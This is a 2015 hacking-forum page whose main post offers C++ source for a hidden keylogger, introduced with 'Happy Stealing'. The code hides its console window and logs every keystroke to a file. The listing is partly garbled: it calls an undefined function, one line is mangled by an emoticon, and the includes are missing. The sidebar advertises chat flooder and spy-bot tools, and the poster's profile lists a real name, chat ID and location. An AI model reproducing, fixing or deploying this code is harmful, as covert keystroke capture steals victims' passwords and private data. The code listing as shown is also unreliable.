Team KillerBuzz Forum 2015
..::::: ωєℓ¢σмє тσ тєαм кιℓℓєявυzz ƒσяυм :::::..

нι νιѕιтσя !

яєgιѕтєя αη∂ ℓσgιη тσ gєт ¢σмρℓєтє α¢¢єѕѕ ! тнαηχ ƒσя вєing α ραят σƒ кιℓℓєявυzz тєαм !!
--xXx--

Join the forum, it's quick and easy

Team KillerBuzz Forum 2015
..::::: ωєℓ¢σмє тσ тєαм кιℓℓєявυzz ƒσяυм :::::..

нι νιѕιтσя !

яєgιѕтєя αη∂ ℓσgιη тσ gєт ¢σмρℓєтє α¢¢єѕѕ ! тнαηχ ƒσя вєing α ραят σƒ кιℓℓєявυzz тєαм !!
--xXx--
Team KillerBuzz Forum 2015
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Latest topics
» New Hindi Aur0ra b0t
Basic KeyLogger Using C++ I_icon_minitimeWed May 06, 2015 11:19 pm by -a.

» KBZ Team Multi Room Flooder v1.0 Coded By th0ufeer@nimbuzz.com
Basic KeyLogger Using C++ I_icon_minitimeTue Apr 21, 2015 4:22 pm by th0ufeer

» Basic KeyLogger Using C++
Basic KeyLogger Using C++ I_icon_minitimeMon Apr 20, 2015 12:48 am by th0ufeer

» Fast room gc webflood
Basic KeyLogger Using C++ I_icon_minitimeSun Apr 19, 2015 9:14 pm by -==riyas==-

» Friends Team online hanger add flood and room flood
Basic KeyLogger Using C++ I_icon_minitimeSat Apr 18, 2015 9:45 pm by chaht

» 24*7 online Spy Bot
Basic KeyLogger Using C++ I_icon_minitimeSat Apr 18, 2015 8:24 pm by -a.

» KBZ Room Destroyer Limited Editon Coded By th0ufeer@nimbuzz.com 5 Id Together Joiner + Add+Room+Pvt Flooder
Basic KeyLogger Using C++ I_icon_minitimeSat Apr 18, 2015 12:26 am by th0ufeer

»  Frb NimBot update.jar
Basic KeyLogger Using C++ I_icon_minitimeFri Apr 17, 2015 10:14 pm by -a.

» New web Flo0oder 2015:P
Basic KeyLogger Using C++ I_icon_minitimeFri Apr 17, 2015 9:46 pm by -a.

Most active topics

Flag Counter
Flag Counter
April 2024
MonTueWedThuFriSatSun
1234567
891011121314
15161718192021
22232425262728
2930     

Calendar Calendar

Who is online?
In total there is 1 user online :: 0 Registered, 0 Hidden and 1 Guest

None

Most users ever online was 26 on Sat Oct 08, 2016 2:42 am
Social bookmarking

Social bookmarking reddit      

Bookmark and share the address of Team KillerBuzz Forum 2015 on your social bookmarking website

Keywords


Basic KeyLogger Using C++

Go down

Basic KeyLogger Using C++ Empty Basic KeyLogger Using C++

Post by th0ufeer Mon Apr 20, 2015 12:48 am

So Guyz, Here Is The Program For A Basic KeyLoger
You Can Try This Code And Compile It, Happy Stealing. !!

[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
using namespace std;
[You must be registered and logged in to see this link.]
[You must be registered and logged in to see this link.]
int thoufeerLog (int key_stroke, char *file);
void Stealth();
int main()
{
Stealth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767) Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
int thoufeerLog (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) ) return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == Cool
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE ]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n"); else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110) fprintf(OUTPUT_FILE, "%s", ".");
else fprintf(OUTPUT_FILE, "%s", &key_stroke); fclose (OUTPUT_FILE);
return 0;
}
void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA(" ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

th0ufeer

REAL NAME : : Thoufeer Sha
NIMBUZZ ID : : th0ufeer@nimbuzz.com
Posts : 3
Join date : 2015-04-17
Age : 28
Location : Kerala, Kannur

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum